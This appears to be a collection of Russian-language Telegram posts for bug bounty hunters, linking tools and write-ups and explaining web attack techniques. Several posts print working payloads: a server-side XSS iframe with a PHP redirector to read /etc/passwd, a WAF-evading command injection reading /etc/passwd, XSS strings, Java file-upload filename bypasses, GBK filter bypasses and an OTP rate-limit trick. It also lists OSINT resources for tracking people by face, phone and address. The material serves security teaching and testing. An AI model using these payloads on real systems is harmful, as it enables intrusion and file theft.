⚙️ Расширение BurpSuite для аудита API
APIKit - расширение с открытым исходном кодом, представляющее собой набор инструментов для обнаружения, сканирования и аудита API. Имеет активный и пассивный режим.
Ссылка на GitHub
#web #tools #api
💉 Инъекция SSH ключа в Google Cloud Compute Engine [Google VRP]
Простая и интересная находка в гугле, позволявшая злоумышленнику в один клик полностью захватить ваш виртуальный сервер.
Читать статью
#web #rce
📝 Подборка уязвимостей за 2022 год
Статья повествует о ряде уязвимостей, обнаруженных в багбаунти, среди которых:
- Обход защиты CSRF через Referrer
- Blind XSS в суперадминке
- Отравление ссылки для сброса пароля
- IDOR, позволяющий получить информацию о приватных видео любого пользователя
- Захват учетной записи Grafana (FOSS / OSS) из-за дефолтных кредов
- Захват AWS Bucket'a
- IDOR в GraphQL, ведущий к утечке персональных данных 10 млн пользователей
- Эксплуатация SSRF
- Нарушение контроля доступа стоимостью $2000
- Брутфорс страницы входа в общедоступной древней программе на HackerOne
Читать статью
#web #xss #idor #ssrf #sto #ato #csrf #bruteforce
🎄С наступающим Новым Годом!
Хочу сказать большое спасибо всем, кто читал, репостил и поддерживал канал в этом непростом году!
Также, огромное спасибо всем авторам и подписчикам, которые делятся своими знаниями и опытом. Совместными усилиями мы вносим значительный вклад в развитие комьюнити и друг друга.
В Новом Году желаю всем побольше найденных уязвимостей, интересных ресерчей и больших выплат! Увидимся в 2023!
Когда нибудь слышали про ошибки во время конвертации из .html
в .pdf
? Нет? Тогда советую ознакомиться с видом уязвимостей под названием Server Side XSS (Dynamic PDF). Обычно, уязвимость этого рода приводит к возможности совершения запросов от имени сервера (SSRF) и в худшем случае - к чтению локальных файлов. Но, так получилось, что иногда дефолтные пейлоады для чтения локальных файлов не работают по какой-то причине.
Что же, ресерчер по имени jakedmurphy1 обнаружил интересное поведение, которое позволяет в большинстве случаев обойти ограничение на чтение файлов следующим образом:
1. В .html
документ, который будет конвертирован в .pdf
помещается следующая полезная нагрузка:<iframe src='http[s]://<your-server>/<your_php_file>?a=file:////etc/passwd'/>
2. На сервере <your-server>
размещается следующий .php код:<?php
$loc = $_GET['a'];
header('Location: '.$loc);
?>
После того, как триггернется Server-Side XSS, мы сможем получить содержимое файла, указанное внутри аргумента a
.
📖 Учебный план для специалистов по ИБ
Практический учебный план, чтобы стать успешным инженером по кибербезопасности, основанный на таких ролях, как Pentest, AppSec, Cloud Security, DevSecOps и т.д. Включает бесплатные и платные ресурсы, инструменты и концепции.
Ссылка на GitHub
#web #redteam
🟧Про скрытые возможности
Ранее я уже рассказывал про скрытые параметры и приводил примеры того, как можно автоматизировать их поиск. Однако, в некоторых случаях, бывает достаточно посмотреть параметры в истории запросов и попробовать использовать их в других конечных точках, где они не используются.
В качестве примера приведу приложение, где в профиле пользователя была возможность изменить email
, но не было возможности менять имя пользователя. При смене почты отправлялся запрос вида:PUT /api/customers/11111111/ HTTP/2
Host: test.com
...{"email":"newEmail@email.com"}
Однако, если заменить параметр email
на firstName
, который был замечен при регистрации, то можно обойти ограничение и изменить значение имени пользователя.
Кроме того, таким способом можно было получить Stores XSS, так как не предусматривалось изменение параметра пользователем и он оставался без должной фильтрации.PUT /api/customers/11111111/ HTTP/2
Host: test.com
...
{"firstName":"<img src='x' onerror='alert(1)'>"}
#web #fuzz #xss
📓Немного про Stored XSS
Выпал на пару недель из-за болезни и в процессе безделья занялся прочтением недавних отчетов и райтапов. В связи с этим, решил написать про Stored XSS.
Основное, на что стоит обратить внимание, это всевозможные страницы в приложении, где отображается наш ввод. Для сложных приложений бывает так, что разработчикам трудно обеспечить одну и ту же очистку данных для каждой страницы. В результате, большинство страниц обрабатывают введенную полезную нагрузку безопасно, но можно найти области, которые не очищают определенные символы и позволяют выполнить XSS. Подобные примеры вы можете увидеть в недавних раскрытых отчетах у Gitlab, Shopify, TikTok и других именитых вендоров.
Но можно ли добавить автоматизации в этот процесс? Чтобы отыскать максимальное количество мест, где встречается наш ввод, используем простую полезную нагрузку вроде <u>tester1337'"
и проксируем все через бурп. Далее, исследуем сайт, пытаясь нажать куда только можно или используем доступный краулер (встроенный в бурп или описанный здесь). Затем в истории бурпа делаем поиск по строке tester1337
и анализируем, как наша полезная нагрузка отображается в различных областях приложений. Можно даже не искать самостоятельно, а написать простенький шаблон для какого-нибудь расширения типа Burp Bounty, который будет делать это за нас при пассивном сканировании.
#web #xss
🚗Ещё больше про взлом автомобилей
А если вам понравилась предыдущая статья, то тут еще одна история, про взлом автомобилей Honda, Nissan, Infiniti и Acura, перевод которой также доступен по ссылке ниже.
Читать статью
#web #carhacking #idor
На https://github.com/features/code-search/ можно присоединиться к бета-тесту обновленного поискового синтаксиса по гитхабу.
Запилены полноценные регулярные выражения, что делает для багхантеров поиск всяких интересный штук, типа захардкорженных кредов/интересных эндпоинтов и так далее более гибким. Так что теперь можно прокачать и вывести на новый уровень старые добрые гитхабдорки.
#bb
👨💻 Уязвимые фрагменты кода
Если хотите попрактиковаться в анализе защищенности кода, то обратите внимание на репозиторий от YesWeHack, которые каждую пятницу публикуют у себя в твиттер фрагменты кода с различными уязвимостями.
Фрагменты кода удобны для начинающих, но подходят для всех уровней. Репозиторий также содержит скрипт для установки и тестирования этих фрагментов кода локально.
Ссылка на GitHub
#code #web
🖇️ Немного про захват поддоменов
Вы знакомы с захватом поддоменов? Если нет, то можете найти немного материала на канале по хештегу #sto. Если вы уже изучали захват поддоменов, то наверняка слышали о Can-I-Take-Over-XYZ. Это репозиторий на GitHub, который показывает нам, какие сервисы уязвимы, а какие нет.
Тем не менее, многие используют его неправильно, и вы, вероятно, тоже. Есть много сервисов, которые даже не присутствуют на Can-I-Take-Over-XYZ и 99% багхантеров еще не охотились на них.
Во-первых, большинство людей видели только первую страницу Can-I-Take-Over-XYZ, однако эта страница редко обновляется и содержит только часть сервисов. Вы можете открыть страницу issue и выполнить поиск по лейблу "vulnerable", чтобы увидеть гораздо больше сервисов, чем вы думали.
Во-вторых, есть много сервисов, о которых просто никогда не сообщали в репозиторий, например readymag.com, reg.ru, shoplo.com, icn.bg, modulus.io, mailgun.com, DYN, Fider, Wufoo, bigcartel и другие. Их должно быть гораздо больше, поэтому, если вы столкнетесь с подобным сервисом в CNAME, и он не задокументирован, посмотрите на него, и возможно, вы будете первым, кто обнаружит в нем захват поддомена.
#web #sto
💉 Command Injection с обходом блокировки ключевых слов
Если вы нашли Command Injection, а WAF блокирует ключевые слова, то можно попробовать один из способов обхода, заключающийся в добавлении обратного слеша и символа новой строки между словами из черного списка:c\%0aat /et\%0ac/pas\%0aswd
Не стоит также забывать про глоббинг, о котором я уже рассказывал у себя на канале.
#web #rce #bypass
🗳 Трюки с произвольной загрузкой файлов в Java
Результаты нормализации имени файла зависят от реализации различных JAR библиотек и личных привычек разработчиков. Это можно использовать для обхода средств защиты. Ниже представлены способы загрузки файла с именем pyn3rd.jsp
для некоторых популярных методов:
1. Метод getSubmittedFileName()
Для данного метода достаточно поместить обратный слеш в имя файла:filename="pyn3rd.j\sp"
После нормализации на сервер загрузится файл с именем pyn3rd.jsp
.
Кроме обратного слеша, можно оставить параметр filename
без закрывающей двойной кавычки и поместить в конце расширения произвольный символ:filename="pyn3rd.\jspz
2. Метод getOriginalFilename()
Этот метод позволяет получить имя файла напрямую без изменений. Однако, когда мы используем другой метод StringUtils.cleanPath()
для нормализации имени файла, которое принимает метод getOriginalFilename()
появляется особенность, позволяющая обойти проверку имени:filename="pyn3rd.jsp/./././."
3. Метод Apache commons-fileupload/commons-io
Добавляем в конце имени файла /
или /[ПРОБЕЛ]
или /
c другими нулевыми значениями (\r
, \n
и т.д.)filename="pyn3rd.jsp/"
Кроме того, если вставить символы после /
или /[ПРОБЕЛ]
, то все, что после слеша, будет принято за имя файла.filename="pyn3rd.jsp/a"
Ссылка на блог
#web #fileupload
▶️ Как видео на YouTube привело к взлому веб-приложения
Базовая разведка, поиск информации о структуре приложения и эксплуатация слепой SQL инъекции.
Читать статью
#web #sqli
🧨 RCE в ManageEngine
Уязвимость удалённого выполнения кода в продуктах ManageEngine (CVE-2022-47966), возникшая из-за использования устаревшей версии Apache Santuario.
Дорк для Shodan:title:"ManageEngine"
Ссылка на шаблон для Nuclei
Ссылка на GitHub
#web #rce #cve
🔎 Регулярные выражения для обновленного GitHub доркинга
Github решил напомнить про свой обновленный поиск, главной фишкой которого стала возможность использования регулярок. Это открывает нам новые возможности для доркинга и поиска утечек. Кстати, если вам так и не поступило приглашение на бета-тест, то можно использовать сервис grep.app
Осталось только подготовить хорошую подборку регулярок, а следовательно, советую взглянуть на данный репозиторий с регулярками для различных захардкоженных кредов, токенов, url-адресов и тд.
А если этого недостаточно, то можно воспользоваться старым добрым редактором регулярок, под названием regex101. У него кстати есть библиотека с примерами под разные цели.
#web #recon #tools #dorks
📰 Ресурсы по информационной безопасности
Список новостных порталов, блогов, подкастов и ресурсов с видео по тематике InfoSec и Cybersecurity, с указанием их веб-сайта и RSS-ленты.
Ссылка на GitHub
#redteam #web
📖 Небольшая подборка полезных материалов
Эта неделя у меня выдалась крайне тяжелой. Не было времени ни на что, кроме работы, в связи с чем, не было и постов тут. К счастью, рабочий год закрыт и появилось время на поиск чего-нибудь интересного за последнее время. Ниже представлена подборка наиболее интересных материалов, попавшихся мне на глаза.
▫️ win3zz/how-i-made-31500-by-submitting-a-bug-to-facebook-d31bb046e204">SSRF в Facebook
Хоть статья и не новая, она отлично показывает подход при поиске уязвимостей с использованием простого, но обширного набора скиллов, вроде базового рекона, чтения документации и анализа исходников.
▫️ Удаление любого видео или Reel’а в Facebook
И снова IDOR. Пожалуй, одна из самых коварных уязвимостей современных веб-приложений, которую, зачастую, можно обнаружить лишь при ручном тестировании и внимательном изучении доступного функционала.
▫️ yaala/account-takeover-and-two-factor-authentication-bypass-de56ed41d7f9">Захват аккаунта и обход двухфакторной аутентификации в Facebook
И снова Facebook, но теперь, уязвимость, найденная при анализе базового функционала конечных точек мобильного приложения. Простое поэтапное изменение параметров с false на true может приводить к неожиданным находкам.
▫️ mkpath
Инструмент, позволяющий создавать кастомные вордлисты по заданному списку слов. Может быть полезен во время брута директорий.
▫️ Дорки для Shodan и Censys
Подборка репозиториев на гитхаб с полезными дорками для Shodan и Censys
▫️ OWASP VulnerableApp
Не знаю, почему не видел этот репозиторий раньше, однако выглядит как хорошая платформа для изучения распространенных уязвимостей в вебе.
#web #recon #idor #labs #dork #tools #ato #ssrf
Тут начали выкладывать записи докладов с Nahamcon(а то ссылка выше уже умерла).
Весьма важный и полезный докладец для веберов от Inti De Ceukelaire.
Чел уже не первый год соревнуется в умении читать различные RFC. После чего придумывает элегантные способы похеков.
В рассказе есть приемчик в стиле "пробел" как атака. Только в его интерпретации это "точка" как атака.
Еще весьма интересным и элегантным мне показался кейс с обходом рэйт лимитов на брут OTP. Сразу вспоминается множество мест и проектов где это можно было применить и проверить...
Например оказывается номер +4915200701337;ext=0 в определенных обстоятельствах может считаться равным номеру +4915200701337. Но увеличивая значение ext, может получиться так, что вы сможете обойти лимит на отправку OTP. Система будет считать это разными номерами. А вы будете получать коды к формально к одному номеру.
Так же рассказаны другие прикольчики и "старые" приёмчики, которые он использовал и использует. Видео доклада тут.
PS: надо бы себе нарисовать план по изучению важных RFC с точки зрения "вебера". Пока Джеймс Кеттле всё не разобрал 😁
📚Обучающие материалы и лаборатории для этичных хакеров
Коллекция обучающих материалов и лабораторий, сделанных для студентов, изучающих информационную безопасность, сети и администрирование. Содержит материалы для подготовки к CEH и прочие ресурсы из различных уголков интернета.
Ссылка на GitHub
#redteam #labs
👁 OSINT: Подборка полезных инструментов и ресурсов. V2.🖖🏻 Приветствую тебя user_name.
• Подборка полезных инструментов, ресурсов, статей и другой необходимой информации по теме OSINT.
• Подборка является продолжением поста от 20.10.2021 (самом популярном посте в S.E. (136K просмотров и 8К репостов)).
Общение:
• Telegram форум для обучения, тренировок и общения.
Коллекции инструментов и ресурсов:
• DarkNet OSINT.
• Awesome OSINT.
• OSINT collection от SANS.
• 22 Best OSINT Blogs and Websites.
• Поиск геолокации нашей цели V1.
• Поиск геолокации нашей цели V2.
• Инструменты для OSINT в Telegram.
• OSINT коллекция от Cyber Detective.
• 4000+ ресурсов и инструментов для OSINT.
• Сотни инструментов для онлайн разведки.
• Подборка инструментов для сегмента onion.
• Коллекция инструментов от Майкла Баззела.
• Сотни инструментов и ресурсов на любой вкус.
• Блоги, подкасты, новостные ресурсы, различные каналы.
• Подборка поисковиков, обеспечивающих конфиденциальность.
Поиск информации по по различным критериям:
• Поиск информации по фото лица.
• Находим имя цели по номеру телефона.
• Поиск информации по номеру телефона.
• Поиск информации с помощью документов.
• Поиск информации о цели, зная Email адрес.
• Поиск информации по ip адресу и не только.
• Поиск цели по ip, MAC и Физическому адресу.
• OSINT по номеру кошелька + подборка поисковиков.
• Поиск информации о цели, имея данные о транспорте.
Курсы и видеоматериал:
• Заметки Осинтера.
• Google maps gameplay.
• Подкасты OSINT mindset.
• Курс: Зеркало интернета.
• Лекция по основам OSINT.
• Видео: 20 полезных приемов OSINT.
• Видео: OSINT tools to track you down.
Статьи и руководства:
• OSINT в Telegram v1.
• OSINT в Telegram v2.
• Идентификация ориентиров.
• Поиск корпоративной почты.
• Maltego. Бесплатные дополнения.
• Поиск информации по электронной почте.
• Поиск цели по username посредством maigret.
• Поиск данных о корпорациях и их владельцах.
• Руководство по GPS метаданным в фотографиях.
• Практическое руководство по online разведке.
• Извлекаем информацию о цели из социальных сетей.
• Конкурсы и задачи по OSINT и геолокации. Качаем скилл.
• Counter-OSINT: руководство по приватности и защите своих данных в сети.
• Расширенное руководство по верификации видеоматериалов.
Инструменты для поиска информации:
• Big Bro.
• MOSINT.
• Trape V2.
• Snoop Project.
• Виртуалки и дистрибутивы.
• Подборка бесплатных дополнений Maltego.
• Полезные инструменты для OSINT от Bellingcat.
• GitHub дорки.
• Дорки Shodan.
• Полезные блок-схемы.
• Ресурсы для поиска Google дорков.
• Полезные расширения для firefox.
• 30 полезных расширений для Google Chrome.
❗️Список не претендует на полноту. @S.E. #OSINT
🔐 Обход средств защиты через GBK Encoding
Добавлю в копилку постов про различные способы обходов средств защиты, ведь если это сработало у Майкрософт, то наверняка сработает где-нибудь еще.
嘊 = %E5%98%8A ⇒ %0A
嘍 = %E5%98%8D ⇒ %0D
嘾 = %E5%98%BE ⇒ %3E (>)
嘼 = %E5%98%BC ⇒ %3C (<)
嘢 = %E5%98%A2 ⇒ %22 (')
嘧 = %E5%98%A7 ⇒ %27 (")
#web #bypass #waf
🚗Взлом автомобилей Hyundai и Genesis
Sam Curry у себя в Twitter поделился историей о том, как им удалось захватить учетную запись и выполнять все команды на автомобилях Hyundai и Genesis. Что примечательно, хватило только уязвимостей в вебе и ничего кроме.
Если еще не видели, то рекомендую глянуть. Перевод истории доступен по ссылке ниже.
Читать статью
#web #carhacking #ato
🔐 Обход средств защиты с помощью фаззинга
Интересная статья об особенностях нормализации в различных системах и обхода регулярных выражений при проверке пользовательского ввода.
В рамках доклада автор представляет инструмент, под названием recollapse, позволяющий генерировать полезные нагрузки для тестирования WAF и обхода слабых реализаций средств защиты.
#web #fuzz #bypass #waf
📓 Отравляем кэш и получаем Stored XSS в Drupal
Если вы раньше работали с Drupal, то можете знать, что у него есть собственная внутренняя система кэширования, которая включена по умолчанию.
Самый простой способ узнать, включено ли кэширование - найти заголовок x-drupal-cache
в ответе. Таким образом, вы даете уникальный ключ (конечная точка + параметры) в запросе, и в ответ вы получаете заголовок x-drupal-cache: MISS
, но если вы снова делаете запрос с тем же ключом и получаете заголовок x-drupal-cache: HIT
в ответе, то кэширование включено. Чтобы узнать больше о том, как работает кэширование и его эксплуатация, прочитайте статью от Portswigger.
После того, как вы узнали, что кэширование включено, один из способов, который можно использовать - это отравление кэша полезной нагрузкой для XSS. Но для этого нужно найти HTTP заголовок, который отражается в ответе. Поскольку Drupal, как и любой другой PHP-фреймворк, иногда поддерживает заголовки X-Original-URL
и X-Rewrite-URL
, можно попробовать ввести эти заголовки в запрос. Если это не сработает, попробуйте брутфорс заголовков.
Для этого можно использовать Param Miner в Burp Suite, который будет перебирать основные заголовки. На изображении ниже вы можете видеть, как был найден заголовок под названием style
, который отражался в ответе и был уязвим для XSS.
Ответ с полезной нагрузкой кэшируется для вышеуказанного уникального запроса. Теперь, когда кто-то посещает адрес:https://www.redacted.com/? q=admin&liec4897=1
отравленный ответ будет отображаться друпалом, в результате чего выполнится Stored XSS.
#web #cache #drupal
🕷️ Katana - новый краулер от Projectdiscovery
Очередной подарок для любителей автоматизации. По словам авторов, мы получаем краулер нового поколения со стандартным и headless режимом, настраиваемым конфигом, скоупом, фильтрацией и многим другим.
P.S: Headless мод с автозаполнением форм очень хорош:katana -u https://test.com -headless -jc -aff -kf -c 50 -fs dn
Ссылка на GitHub
#web #tools
📚 Материалы с конференций по кибербезопасности
В репозитории собраны различные материалы с недавних конференций по кибербезопасности, с ссылками на их видео и слайды.
Ссылка на GitHub
#web
10 способов отрепортить ерунду и получить за это баунти (1 часть)
Написал небольшую статью про самые нелепые баги за которые мне удавалось получить награду ;)
Буду благодарен если где-то поделитесь статьей)
https://telegra.ph/10-sposobov-otreportit-erundu-i-poluchit-za-ehto-baunti-10-10